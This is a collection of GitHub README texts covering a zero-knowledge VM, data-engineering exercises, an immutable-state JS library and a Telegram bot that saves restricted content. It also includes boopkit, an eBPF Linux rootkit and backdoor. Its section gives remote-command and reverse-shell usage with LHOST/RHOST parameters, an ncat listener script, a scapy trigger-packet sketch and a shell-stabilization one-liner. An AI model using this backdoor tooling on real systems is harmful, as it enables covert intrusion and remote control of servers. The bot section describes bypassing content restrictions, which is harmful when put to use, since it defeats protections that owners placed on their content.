Building from source requires some additional tools and steps. Please refer to CONTRIBUTING.md for the full instructions.

Rust Binaries: cargo-risczero, risc0-r0vm, risc0-tools (crates.io badge table omitted).

Rust Libraries: bonsai-sdk, risc0-binfmt, risc0-build, risc0-build-kernel, risc0-circuit-recursion, risc0-circuit-recursion-sys, risc0-circuit-rv32im, risc0-circuit-rv32im-sys, risc0-core, risc0-groth16, risc0-sys, risc0-zkp, risc0-zkvm, risc0-zkvm-platform (crates.io/docs.rs badge table omitted).

Feature flags

The following feature flags are present in one or more of the crates listed above:

| Feature | Target(s) | Implies | Description | Crates |
| --- | --- | --- | --- | --- |
| client | all except rv32im | std | Enables the client API. | risc0-zkvm |
| cuda | | prove, std | Enables CUDA GPU acceleration for the prover. Requires the CUDA toolkit to be installed. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
| disable-dev-mode | all except rv32im | | Disables dev mode so that proving and verifying may not be faked. Used to prevent a misplaced RISC0_DEV_MODE from breaking security in production systems. | risc0-zkvm |
| metal | macos | prove, std | Enables Metal GPU acceleration for the prover. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
| prove | all except rv32im | std | Enables the prover, incompatible within the zkvm guest. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
| std | all | | Support for the Rust stdlib. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |

License

This project is licensed under the terms of the Apache2 license. See LICENSE.;RISC Zero is a zero-knowledge verifiable general computing platform based on zk-STARKs and the RISC-V microarchitecture.;stark,zero-knowledge,virtual-machine,risc-v,cryptography,rust
risc0/risc0
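To make the protocol terminology above concrete, here is a toy Python model of the receipt data flow: a journal plus a seal, checked against an image ID. This is emphatically not the risc0 API and provides no zero-knowledge or soundness whatsoever; a plain HMAC stands in for the STARK seal purely to show which party holds which data.

```python
import hashlib
import hmac

# Stand-in for the proof system. In the real protocol there is NO shared
# secret: the mathematics of the zk-STARK plays this binding role.
SHARED_KEY = b"toy stand-in for the proof system"

def image_id(elf_bytes: bytes) -> str:
    """A 'special cryptographic hash of the ELF file' (here: plain SHA-256)."""
    return hashlib.sha256(elf_bytes).hexdigest()

def prove(elf_bytes: bytes, guest_fn, guest_input) -> dict:
    """Host side: run the guest and produce a receipt = journal + seal."""
    journal = guest_fn(guest_input)  # only the journal is revealed, never guest_input
    seal = hmac.new(SHARED_KEY, image_id(elf_bytes).encode() + journal, "sha256").hexdigest()
    return {"journal": journal, "seal": seal}

def verify(receipt: dict, expected_image_id: str) -> bool:
    """Verifier side: check the seal binds the journal to the expected image ID."""
    expected = hmac.new(SHARED_KEY, expected_image_id.encode() + receipt["journal"], "sha256").hexdigest()
    return hmac.compare_digest(expected, receipt["seal"])

elf = b"\x7fELF...method binary..."                      # hypothetical method ELF
receipt = prove(elf, lambda x: str(x * x).encode(), 7)   # journal reveals only the output
assert verify(receipt, image_id(elf))                    # tampering with journal or seal fails this check
```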
krisnova/boopkit;``` ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██╗████████╗ ██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗██║ ██╔╝██║╚══██╔══╝ ██████╔╝██║ ██║██║ ██║██████╔╝█████╔╝ ██║ ██║ ██╔══██╗██║ ██║██║ ██║██╔═══╝ ██╔═██╗ ██║ ██║ ██████╔╝╚██████╔╝╚██████╔╝██║ ██║ ██╗██║ ██║ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ Author: Kris Nóva <kris@nivenly.com> Version 1.4.0 IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES. DO NOT ATTEMPT TO USE THE TOOLS TO VIOLATE THE LAW. THE AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTION. MISUSE OF THE SOFTWARE, INFORMATION, OR SOURCE CODE MAY RESULT IN CRIMINAL CHARGES. Use at your own risk. ================================================================ Boopkit. Linux rootkit and backdoor. Built using eBPF. Usage: boopkit [options] Options: -h, help Display help and usage for boopkit. -i, interface Interface name. lo, eth0, wlan0, etc -s, sudo-bypass Bypass sudo check. Breaks PID obfuscation. -r, reverse-conn Attempt a reverse RCE lookup if no payload found. -q, quiet Disable output. -x, reject Source addresses to reject triggers from. ``` Linux backdoor, rootkit, and eBPF bypass tools. Remote command execution over raw TCP. Tested on Linux kernel 5.16 Tested on Linux kernel 5.17 Remote code execution over TCP (SSH, Nginx, Kubernetes, etc) Network gateway bypass (bad checksums, TCP reset) Self obfuscation at runtime (eBPF process hiding) Disclaimer This is NOT an exploit! This requires prior privileged access on a server in order to work! I am a professional security researcher. These are white hat tools used for research purposes only. Use this responsibly. Never use this software illegally. Server Side Download and build boopkit. bash wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.3.0.tar.gz tar -xzf v1.3.0.tar.gz cd boopkit-1.3.0/ make sudo make install Run boopkit in the foreground. ```bash Reject all boops on localhost and 10.0.0.1 boopkit -x 127.0.0.1 -x 10.0.0.1 ``` Run boopkit in the background in quiet mode. ```bash Danger! This can be VERY hard to stop! Run this at your own risk! boopkit -q & ``` Boopkit is now running and can be exploited using the client boopkit-boop command line tool. Client Side Download and build boopkit. bash wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.2.0.tar.gz tar -xzf v1.2.0.tar.gz cd boopkit-1.2.0/ make sudo make install Run boopkit-boop against the server. ```bash =================== RCE="ls -la" =================== LHOST="127.0.0.1" LPORT="3535" RHOST="127.0.0.1" RPORT="22" boopkit-boop \ -lhost $LHOST \ -lport $LPORT \ -rhost $RHOST \ -rport $RPORT \ -c "$RCE" ``` Boop Vectors Boopkit will respond to various events on the network. Both of which can be triggered with the boopkit-boop tool. TCP Header Format. Taken from RFC 793 . 
(RFC 793, September 1981)

```
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|          Source Port          |       Destination Port        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                        Sequence Number                        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Acknowledgment Number                      |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|  Data |           |U|A|P|R|S|F|                               |
| Offset| Reserved  |R|C|S|S|Y|I|            Window             |
|       |           |G|K|H|T|N|N|                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Checksum            |         Urgent Pointer        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                    Options                    |    Padding    |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                             data                              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```

1. Bad Checksum

First, the boopkit-boop tool will send a malformed TCP SYN packet with an empty checksum to the server over a SOCK_RAW socket. This will trigger boopkit remotely regardless of what TCP services are running, so it works against any Linux server running boopkit, whatever the state of its TCP services. Use -p with boopkit-boop to only use this first vector.

⚠️ Some modern network hardware will DROP all malformed-checksum packets, such as the one required to exploit boopkit using this vector!

2. Sending ACK-RST packet

Next, the boopkit-boop tool will complete a valid TCP handshake with a SOCK_STREAM socket against a remote TCP service such as SSH, Kubernetes, or Nginx. After the initial TCP handshake is complete, boopkit-boop will repeat the process a second time. The second handshake will flip the TCP reset flag in the packet, triggering a TCP reset on the server.

Either of these tactics is enough to independently trigger boopkit. Various network hardware and runtime conditions will make one tactic or the other more viable; boopkit tries both and responds to both by default. (A scapy sketch of the first vector follows this section.)

Boopscript

The boopscript file is a Metasploit-compatible script that can be used to remotely trigger the boopkit backdoor after boopkit-boop is installed on a remote Linux machine.

```bash
# boopscript
RHOST="127.0.0.1"
RPORT="22"
LHOST="127.0.0.1"
LPORT="3535"
NCAT="/usr/bin/ncat"
NCATLISTENPORT="3545"
```

Compile Time Dependencies

- clang
- bpftool (required for libbpf)
- xdp-tools (required for libxdp)
- llvm
- pcap
- lib32-glibc

Reverse Shell Stabilization

```bash
python -c "import pty; pty.spawn('/bin/bash')"
```

References

- Tracepoints with BPF
- Raw TCP Sockets
- Bad BPF

Credit to the original authors for their helpful code samples! I forked a lot of code for this project!;Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin.;tcp,linux-kernel-hacking,ebpf,security
krisnova/boopkit
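For study in a lab you control, the bad-checksum vector described above can also be reproduced with a short scapy script instead of boopkit-boop. This is an illustrative sketch, not project code; the addresses are placeholders, and sending raw packets requires root.

```python
# Sketch of boop vector 1: a TCP SYN with a deliberately wrong checksum.
# Requires root and scapy (pip install scapy). Lab use only.
from scapy.all import IP, TCP, send

RHOST, RPORT = "127.0.0.1", 22  # placeholder target running boopkit

# Setting chksum explicitly stops scapy from recomputing it, so the SYN
# goes out malformed -- the condition boopkit's eBPF program watches for.
pkt = IP(dst=RHOST) / TCP(dport=RPORT, flags="S", chksum=0)
send(pkt, verbose=False)

# Vector 2 (handshake then reset) is easiest with a normal socket: connect(),
# then close with SO_LINGER set to (on, 0) so the kernel sends RST, not FIN.
```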
danielbeach/data-engineering-practice;Data Engineering Practice Problems

One of the main obstacles of Data Engineering is the large and varied set of technical skills that can be required on a day-to-day basis.

*** Note - If you email a link to your GitHub repo with all the completed exercises, I will send you back a free copy of my ebook Introduction to Data Engineering. ***

The aim of this repository is to help you develop and learn those skills. Generally, here are the high-level topics that these practice problems will cover:

- Python data processing.
- csv, flat-file, parquet, json, etc.
- SQL database table design.
- Python + Postgres, data ingestion and retrieval.
- PySpark
- Data cleansing / dirty data.

How to work on the problems.

You will need two things to work effectively on almost all of these problems:
- Docker
- docker-compose

All the tools and technologies you need will be packaged into the dockerfile for each exercise. For each exercise you will need to cd into that folder and run the docker build command; that command is listed in the README for each exercise, so follow those instructions.

Beginner Exercises

Exercise 1 - Downloading files.
The first exercise tests your ability to download a number of files from an HTTP source and unzip them, storing them locally with Python (a sketch of this pattern appears after this section). cd Exercises/Exercise-1 and see the README in that location for instructions.

Exercise 2 - Web Scraping + Downloading + Pandas
The second exercise tests your ability to perform web scraping, build uris, download files, and use Pandas to do some simple cumulative actions. cd Exercises/Exercise-2 and see the README in that location for instructions.

Exercise 3 - Boto3 AWS + s3 + Python.
The third exercise tests a few skills. This time we will be using a popular aws package called boto3 to try to perform multi-step actions to download some open source s3 data files. cd Exercises/Exercise-3 and see the README in that location for instructions.

Exercise 4 - Convert JSON to CSV + Ragged Directories.
The fourth exercise focuses more on the file types json and csv, and working with them in Python. You will have to traverse a ragged directory structure, finding any json files and converting them to csv.

Exercise 5 - Data Modeling for Postgres + Python.
The fifth exercise is going to be a little different than the rest. In this problem you will be given a number of csv files. You must create a data model / schema to hold these data sets, including indexes, then create all the tables inside Postgres by connecting to the database with Python.

Intermediate Exercises

Exercise 6 - Ingestion and Aggregation with PySpark.
The sixth exercise is going to step it up a little and move onto more popular tools. In this exercise we are going to load some files using PySpark and then be asked to do some basic aggregation. Best of luck!

Exercise 7 - Using Various PySpark Functions
The seventh exercise, taking a page out of the previous one, focuses on using a few of the more common built-in PySpark functions from pyspark.sql.functions and applying them to real-life problems. Many times, to solve simple problems we have to find and use multiple functions available from libraries. This will test your ability to do that.

Exercise 8 - Using DuckDB for Analytics and Transforms.
The eighth exercise: using new tools is imperative to growing as a Data Engineer, and DuckDB is one of those new tools. In this exercise you will have to complete a number of analytical and transformation tasks using DuckDB.
This will require an understanding of the functions and documentation of DuckDB.

Exercise 9 - Using Polars lazy computation.
The ninth exercise: Polars is a new Rust-based tool with a wonderful Python package that has taken Data Engineering by storm. It's better than Pandas because it has both a SQL context and supports lazy evaluation for larger-than-memory data sets! Show your lazy skills!;Data Engineering Practice Problems;[]
danielbeach/data-engineering-practice
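As a taste of Exercise 1 above, here is a hedged Python sketch of the download-and-unzip pattern it asks for. The URL list is hypothetical and error handling is minimal; the real exercise supplies its own URIs and acceptance criteria.

```python
import zipfile
from io import BytesIO
from pathlib import Path

import requests  # assumed available; the exercises pin dependencies in their Dockerfiles

# Hypothetical URIs -- the real exercise provides its own list.
DOWNLOAD_URIS = [
    "https://example.com/data/Divvy_Trips_2018_Q4.zip",
]

def main(dest: str = "downloads") -> None:
    out_dir = Path(dest)
    out_dir.mkdir(exist_ok=True)
    for uri in DOWNLOAD_URIS:
        resp = requests.get(uri, timeout=30)
        if resp.status_code != 200:  # some URIs may be intentionally dead
            print(f"skipping {uri}: HTTP {resp.status_code}")
            continue
        # Unzip in memory and keep only the extracted files.
        with zipfile.ZipFile(BytesIO(resp.content)) as zf:
            zf.extractall(out_dir)

if __name__ == "__main__":
    main()
```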
unadlib/mutative;Mutative

Mutative - A JavaScript library for efficient immutable updates, 2-6x faster than a naive handcrafted reducer, and more than 10x faster than Immer.

Why is Mutative faster than the spread operation (naive handcrafted reducer)?

The spread operation has performance pitfalls, which are detailed in the following articles:

- The reduce ({...spread}) anti-pattern
- How slow is the Spread operator in JavaScript?

And Mutative's optimization focuses on shallow copy optimization, more complete lazy drafts, finalization process optimization, and more.

Motivation

Writing immutable updates by hand is usually difficult, prone to errors, and cumbersome. Immer helps us write simpler immutable updates with "mutative" logic, but its performance issue causes a runtime overhead. Immer must have auto-freeze enabled by default (performance will be worse if auto-freeze is disabled), yet such frozen immutable state is not always what you want: in scenarios such as cross-process communication, remote data transfer, etc., we have to constantly freeze these immutable data.

There are more parts that could be improved, such as better type inference, non-intrusive marking, support for more types of immutability, safer immutability, more edge cases, and so on. This is why Mutative was created.

Mutative vs Naive Handcrafted Reducer Performance

Mutative vs Reducer benchmark by object:

- Naive handcrafted reducer

```ts
// baseState type: Record
const state = {
  ...baseState,
  key0: {
    ...baseState.key0,
    value: i,
  },
};
```

- Mutative

```ts
const state = create(baseState, (draft) => {
  draft.key0.value = i;
});
```

![Mutative vs Reducer benchmark by object](benchmark-object.jpg)

> Measure (seconds) to update the 1K-100K items object, lower is better ([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark-object.ts)).

Mutative is up to 2x faster than a naive handcrafted reducer for updating immutable objects.

Mutative vs Reducer benchmark by array:

- Naive handcrafted reducer

```ts
// baseState type: { value: number }[]

// slower 6x than Mutative
const state = [
  { ...baseState[0], value: i },
  ...baseState.slice(1, baseState.length),
];

// slower 2.5x than Mutative
// const state = baseState.map((item, index) =>
//   index === 0 ? { ...item, value: i } : item
// );

// same performance as Mutative
// const state = [...baseState];
// state[0] = { ...baseState[0], value: i };
```

> The actual difference depends on which spread operation syntax you use.

- Mutative

```ts
const state = create(baseState, (draft) => {
  draft[0].value = i;
});
```

![Mutative vs Reducer benchmark by array](benchmark-array.jpg)

> Measure (seconds) to update the 1K-100K items array, lower is better ([view source](https://github.com/unadlib/mutative/blob/main/test/performance/benchmark-array.ts)).

Mutative is up to 6x faster than a naive handcrafted reducer for updating immutable arrays.

Mutative vs Immer Performance

Mutative passed all of Immer's test cases. Measure (ops/sec) to update 50K arrays and 1K objects, bigger is better (view source).
[Mutative v1.0.5 vs Immer v10.1.1]

```
Naive handcrafted reducer - No Freeze x 4,442 ops/sec ±0.38% (95 runs sampled)
Mutative - No Freeze x 6,199 ops/sec ±0.79% (89 runs sampled)
Immer - No Freeze x 5.30 ops/sec ±0.38% (18 runs sampled)
Mutative - Freeze x 974 ops/sec ±1.77% (92 runs sampled)
Immer - Freeze x 376 ops/sec ±0.67% (92 runs sampled)
Mutative - Patches and No Freeze x 969 ops/sec ±0.99% (97 runs sampled)
Immer - Patches and No Freeze x 5.27 ops/sec ±0.36% (18 runs sampled)
Mutative - Patches and Freeze x 514 ops/sec ±0.97% (95 runs sampled)
Immer - Patches and Freeze x 275 ops/sec ±0.74% (89 runs sampled)

The fastest method is Mutative - No Freeze
```

Run `yarn benchmark` to measure performance. OS: macOS 14.2.1, CPU: Apple M1 Max, Node.js: v20.11.0

Immer relies on auto-freeze being enabled; if auto-freeze is disabled, Immer has a huge performance drop and Mutative has a huge performance lead, especially with large data structures, where the lead is more than 50x. So if you are using Immer, you will have to enable auto-freeze for performance. Mutative disables auto-freeze by default. With the default configuration of both, we can see the 16x performance gap between Mutative (6,199 ops/sec) and Immer (376 ops/sec).

Overall, Mutative has a huge performance lead over Immer across many more performance testing scenarios. Run `yarn performance` to get all the performance results locally.

More performance testing scenarios; Mutative is up to `2.5X-73.8X` faster than Immer:

![Mutative vs Immer - All benchmark results by average multiplier](test/benchmark/results/all.jpg)

> [view source](https://github.com/unadlib/mutative/blob/main/test/benchmark).

Features and Benefits

- Mutation makes immutable updates - Immutable data structures supporting objects, arrays, Sets and Maps.
- High performance - 10x faster than Immer by default, even faster than a naive handcrafted reducer.
- Optional freezing state - No freezing of immutable data by default.
- Support for JSON Patch - Full compliance with the JSON Patch specification.
- Custom shallow copy - Support for more types of immutable data.
- Support mark for immutable and mutable data - Allows for non-invasive marking.
- Safer mutable data access in strict mode - It brings more secure immutable updates.
- Support for reducer - Supports reducer functions and any other immutable state library.

Difference between Mutative and Immer

| | Mutative | Immer |
| :-- | --: | :-: |
| Custom shallow copy | ✅ | ❌ |
| Strict mode | ✅ | ❌ |
| No data freeze by default | ✅ | ❌ |
| Non-invasive marking | ✅ | ❌ |
| Complete freeze data | ✅ | ❌ |
| Non-global config | ✅ | ❌ |
| async draft function | ✅ | ❌ |
| Fully compatible with JSON Patch spec | ✅ | ❌ |

Mutative has fewer bugs, such as accidental draft escapes, than Immer; view details.

Installation

Yarn

```sh
yarn add mutative
```

NPM

```sh
npm install mutative
```

CDN

- Unpkg: `<script src="https://unpkg.com/mutative"></script>`
- JSDelivr: `<script src="https://cdn.jsdelivr.net/npm/mutative"></script>`

Usage

```ts
import { create } from 'mutative';

const baseState = {
  foo: 'bar',
  list: [{ text: 'coding' }],
};

const state = create(baseState, (draft) => {
  draft.list.push({ text: 'learning' });
});

expect(state).not.toBe(baseState);
expect(state.list).not.toBe(baseState.list);
```

`create(baseState, (draft) => void, options?: Options): newState`

The first argument of create() is the base state.
Mutative drafts it and passes it to the argument of the draft function, performing the draft mutation until the draft function finishes; Mutative then finalizes it and produces the new state. Use create() with options for more advanced features.

APIs

- create()
- apply()
- current()
- original()
- unsafe()
- isDraft()
- isDraftable()
- rawReturn()
- makeCreator()
- markSimpleObject()

create()

Use create() for draft mutation to get a new state; it also supports currying.

```ts
import { create } from 'mutative';

const baseState = {
  foo: 'bar',
  list: [{ text: 'todo' }],
};

const state = create(baseState, (draft) => {
  draft.foo = 'foobar';
  draft.list.push({ text: 'learning' });
});
```

In this basic example, the changes to the draft are 'mutative' within the draft callback, and create() finally produces a new immutable state.

`create(state, fn, options)` - the options argument is optional:

- strict - `boolean`, the default is false. Forbid accessing non-draftable values in strict mode (unless using unsafe()). When strict mode is enabled, mutable data can only be accessed using unsafe(). It is recommended to enable strict in development mode and disable strict in production mode. This ensures safe explicit returns and also keeps good performance in the production build. If a value that does not mix in any current draft, or is undefined, is returned, then use rawReturn().
- enablePatches - `boolean | { pathAsArray?: boolean; arrayLengthAssignment?: boolean; }`, the default is false. Enable patches, and return the patches/inversePatches. If you need to set the shape of the generated patches in more detail, you can set pathAsArray and arrayLengthAssignment. pathAsArray's default value is `true`: if it's `true`, the path will be an array, otherwise it is a string. arrayLengthAssignment's default value is `true`: if it's `true`, the array length will be included in the patches, otherwise the array length is not included (NOTE: if arrayLengthAssignment is `false`, it is fully compatible with the JSON Patch spec, but it may have additional performance loss); view related discussions.
- enableAutoFreeze - `boolean`, the default is false. Enable auto-freeze: return frozen state, and enable circular reference checking only in development mode.
- mark - `(target) => ('mutable'|'immutable'|function) | (target) => ('mutable'|'immutable'|function)[]`. Set a mark to determine if the value is mutable or if an instance is immutable; it can also return a shallow copy function (AutoFreeze and Patches should both be disabled, as some patch operations might not be equivalent). When the mark function is `(target) => 'immutable'`, it means all the objects in the state structure are immutable; in this specific case, you can fully turn on AutoFreeze and Patches. mark supports multiple marks, which are executed in order; the first mark that returns a value is used. When an object tree node is marked by the mark function as `mutable`, all of its child nodes will also not be drafted by Mutative and will retain their original values.
create() - Currying create draft ts const [draft, finalize] = create(baseState); draft.foobar.bar = 'baz'; const state = finalize(); Support set options such as const [draft, finalize] = create(baseState, { enableAutoFreeze: true }); create producer ts const produce = create((draft) => { draft.foobar.bar = 'baz'; }); const state = produce(baseState); Also support set options such as const produce = create((draft) => {}, { enableAutoFreeze: true }); apply() Use apply() for applying patches to get the new state. ```ts import { create, apply } from 'mutative'; const baseState = { foo: 'bar', list: [{ text: 'todo' }], }; const [state, patches, inversePatches] = create( baseState, (draft) => { draft.foo = 'foobar'; draft.list.push({ text: 'learning' }); }, { enablePatches: true, } ); const nextState = apply(baseState, patches); expect(nextState).toEqual(state); const prevState = apply(state, inversePatches); expect(prevState).toEqual(baseState); ``` current() Get the current value from a draft. For any draft where a child node has been modified, the state obtained by executing current() each time will be a new reference object. For a draft where no child nodes have been modified, executing current() will always return the original state. It is recommended to minimize the number of times current() is executed when performing read-only operations, ideally executing it only once. ts const state = create({ a: { b: { c: 1 } }, d: { f: 1 } }, (draft) => { draft.a.b.c = 2; expect(current(draft.a)).toEqual({ b: { c: 2 } }); // The node `a` has been modified. expect(current(draft.a) === current(draft.a)).toBeFalsy(); // The node `d` has not been modified. expect(current(draft.d) === current(draft.d)).toBeTruthy(); }); original() Get the original value from a draft. ```ts const baseState = { foo: 'bar', list: [{ text: 'todo' }], }; const state = create(baseState, (draft) => { draft.foo = 'foobar'; draft.list.push({ text: 'learning' }); expect(original(draft.list)).toEqual([{ text: 'todo' }]); }); ``` unsafe() When strict mode is enabled, mutable data can only be accessed using unsafe() . ```ts const baseState = { list: [], date: new Date(), }; const state = create( baseState, (draft) => { unsafe(() => { draft.date.setFullYear(2000); }); // or return the mutable data: // const date = unsafe(() => draft.date); }, { strict: true, } ); ``` isDraft() Check if a value is a draft. ```ts const baseState = { date: new Date(), list: [{ text: 'todo' }], }; const state = create(baseState, (draft) => { expect(isDraft(draft.date)).toBeFalsy(); expect(isDraft(draft.list)).toBeTruthy(); }); ``` isDraftable() Check if a value is draftable ```ts const baseState = { date: new Date(), list: [{ text: 'todo' }], }; expect(isDraftable(baseState.date)).toBeFalsy(); expect(isDraftable(baseState.list)).toBeTruthy(); ``` You can set a mark to determine if the value is draftable, and the mark function should be the same as passing in create() mark option. rawReturn() For return values that do not contain any drafts, you can use rawReturn() to wrap this return value to improve performance. It ensure that the return value is only returned explicitly. ts const baseState = { id: 'test' }; const state = create(baseState as { id: string } | undefined, (draft) => { return rawReturn(undefined); }); expect(state).toBe(undefined); If the return value mixes drafts, you should not use rawReturn() . 
ts const baseState = { a: 1, b: { c: 1 } }; const state = create(baseState, (draft) => { if (draft.b.c === 1) { return { ...draft, a: 2, }; } }); expect(state).toEqual({ a: 2, b: { c: 1 } }); expect(isDraft(state.b)).toBeFalsy(); If you use rawReturn() , we recommend that you enable strict mode in development. ts const baseState = { a: 1, b: { c: 1 } }; const state = create( baseState, (draft) => { if (draft.b.c === 1) { return rawReturn({ ...draft, a: 2, }); } }, { strict: true, } ); // it will warn `The return value contains drafts, please don't use 'rawReturn()' to wrap the return value.` in strict mode. expect(state).toEqual({ a: 2, b: { c: 1 } }); expect(isDraft(state.b)).toBeFalsy(); makeCreator() makeCreator() only takes options as the first argument, resulting in a custom create() function. ```ts const baseState = { foo: { bar: 'str', }, }; const create = makeCreator({ enablePatches: true, }); const [state, patches, inversePatches] = create(baseState, (draft) => { draft.foo.bar = 'new str'; }); ``` markSimpleObject() markSimpleObject() is a mark function that marks all objects as immutable. ```ts const baseState = { foo: { bar: 'str', }, simpleObject: Object.create(null), }; const state = create( baseState, (draft) => { draft.foo.bar = 'new str'; draft.simpleObject.a = 'a'; }, { mark: markSimpleObject, } ); expect(state.simpleObject).not.toBe(baseState.simpleObject); ``` View more API docs . Using TypeScript castDraft() castImmutable() Draft<T> Immutable<T> Patches Patch Options<O, F> Integration with React use-mutative - A 2-6x faster alternative to useState with spread operation use-travel - A React hook for state time travel with undo, redo, reset and archive functionalities. FAQs I'm already using Immer, can I migrate smoothly to Mutative? Yes. Unless you have to be compatible with Internet Explorer, Mutative supports almost all of Immer features, and you can easily migrate from Immer to Mutative. Migration is also not possible for React Native that does not support Proxy. React Native uses a new JS engine during refactoring - Hermes, and it (if < v0.59 or when using the Hermes engine on React Native < v0.64) does not support Proxy on Android , but React Native v0.64 with the Hermes engine support Proxy . Can Mutative be integrated with Redux? Yes. Mutative supports return values for reducer, and redux-toolkit is considering support for configurable produce() . Migration from Immer to Mutative mutative-compat - Mutative wrapper with full Immer API compatibility, you can use it to quickly migrate from Immer to Mutative. produce() -> create() Mutative auto freezing option is disabled by default, Immer auto freezing option is enabled by default (if disabled, Immer performance will have a more huge drop). You need to check if auto freezing has any impact on your project. If it depends on auto freezing, you can enable it yourself in Mutative. 
```ts import produce from 'immer'; const nextState = produce(baseState, (draft) => { draft[1].done = true; draft.push({ title: 'something' }); }); ``` Use Mutative ```ts import { create } from 'mutative'; const nextState = create(baseState, (draft) => { draft[1].done = true; draft.push({ title: 'something' }); }); ``` Patches ```ts import { produceWithPatches, applyPatches } from 'immer'; enablePatches(); const baseState = { age: 33, }; const [nextState, patches, inversePatches] = produceWithPatches( baseState, (draft) => { draft.age++; } ); const state = applyPatches(nextState, inversePatches); expect(state).toEqual(baseState); ``` Use Mutative ```ts import { create, apply } from 'mutative'; const baseState = { age: 33, }; const [nextState, patches, inversePatches] = create( baseState, (draft) => { draft.age++; }, { enablePatches: true, } ); const state = apply(nextState, inversePatches); expect(state).toEqual(baseState); ``` Return undefined ```ts import produce, { nothing } from 'immer'; const nextState = produce(baseState, (draft) => { return nothing; }); ``` Use Mutative ```ts import { create, rawReturn } from 'mutative'; const nextState = create(baseState, (draft) => { return rawReturn(undefined); }); ``` Contributing Mutative goal is to provide efficient and immutable updates. The focus is on performance improvements and providing better APIs for better development experiences. We are still working on it and welcome PRs that may help Mutative. Development Workflow: Clone Mutative repo. Run yarn install to install all the dependencies. Run yarn prettier to format the code. yarn test --watch runs an interactive test watcher. Run yarn commit to make a git commit. License Mutative is MIT licensed .;Efficient immutable updates, 2-6x faster than naive handcrafted reducer, and more than 10x faster than Immer.;immer,immutability,immutable,reducer,redux,mutable,mutation,state-management,mutative,react
unadlib/mutative
vasusen-code/SaveRestrictedContentBot;Save restricted content Bot

Contact: Telegram

A stable telegram bot to get restricted messages, with custom thumbnail support, made by Mahesh Chauhan.

- Works for both public and private chats
- Custom thumbnail support for private medias
- Supports text and webpage media messages
- Faster speed
- Force-subscribe available
- To save from bots, send a link in this format: t.me/b/bot_username/message_id (use Plus Messenger for message_id)
- /batch - (For owner only) Use this command to save up to 100 files from a private or public restricted channel at once.
- /cancel - Use this to stop a batch

A time delay is added to avoid FloodWait and keep the user account safe.

Variables

- API_ID
- API_HASH
- SESSION
- BOT_TOKEN
- AUTH - Owner user id
- FORCESUB - Public channel username without '@'. Don't forget to add the bot to the channel as an administrator.

Get API & Pyrogram string session from:

- API: API scrapper Bot or Telegram.org
- PYROGRAM SESSION: SessionGen Bot
- BOT TOKEN: @Botfather on telegram

Deploy

Deploy on VPS

Easy method:
- Install docker-compose
- Fill in the variables in the docker-compose.yml file using your favorite text editor or nano
- Start the container

```bash
sudo apt install docker-compose -y
nano docker-compose.yml
sudo docker-compose up --build
```

The hard way:
- Fill in the vars in your fork in this file as shown in this picture
- Enter all the below commands

```bash
sudo apt update
sudo apt install ffmpeg git python3-pip
git clone your_repo_link
cd saverestrictedcontentbot
pip3 install -r requirements.txt
python3 -m main
```

- If you want the bot to keep running in the background, enter `screen -S srcb` before `python3 -m main`; after `python3 -m main`, press Ctrl+A, then Ctrl+D.
- If you want to stop the bot, enter `screen -r srcb`, and to kill the screen enter `screen -S srcb -X quit`.

Deploy your bot on Render

Tutorial - Click here

Deploy your bot on heroku

» Method - 1:
- Star the repo, and fork it in desktop mode
- Go to settings of your forked repo
- Rename your repo by any other name
- Click on the deploy button

» Method - 2:
- Star the repo, and fork it in desktop mode
- Create an app in heroku
- Go to settings of the app ›› config vars ›› add all variables
- Add buildpacks
- Connect to github and deploy
- Turn on dynos

Buildpacks for manual deploy:
- heroku/python
- https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest.git

Deploy your bot on Okteto [Useless]

Tutorial for okteto - click here;Stable telegram bot to save Restricted content with custom thumbnail support.;telegram,bot,telegram-bot,save,restricted,content,forward,clone
vasusen-code/SaveRestrictedContentBot
